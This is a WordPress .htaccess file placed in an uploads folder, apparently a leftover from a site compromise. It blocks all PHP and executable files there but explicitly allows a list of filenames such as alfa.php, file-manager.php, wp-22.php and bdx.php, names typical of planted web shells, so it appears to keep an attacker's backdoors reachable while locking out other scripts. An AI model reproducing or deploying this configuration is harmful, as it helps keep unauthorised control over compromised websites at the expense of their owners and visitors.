File: /var/www/html/wp-content/uploads/2024/04/.htaccess
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(alfa.php|mp3.php|mp4.php|mp5.php|mp6.php|themes-t20.php|style-css.php|alpin.php|file-manager.php|style.php|index.php|plugin-css.php|autoload_classmap.php|style.php|wp-22.php|bdx.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>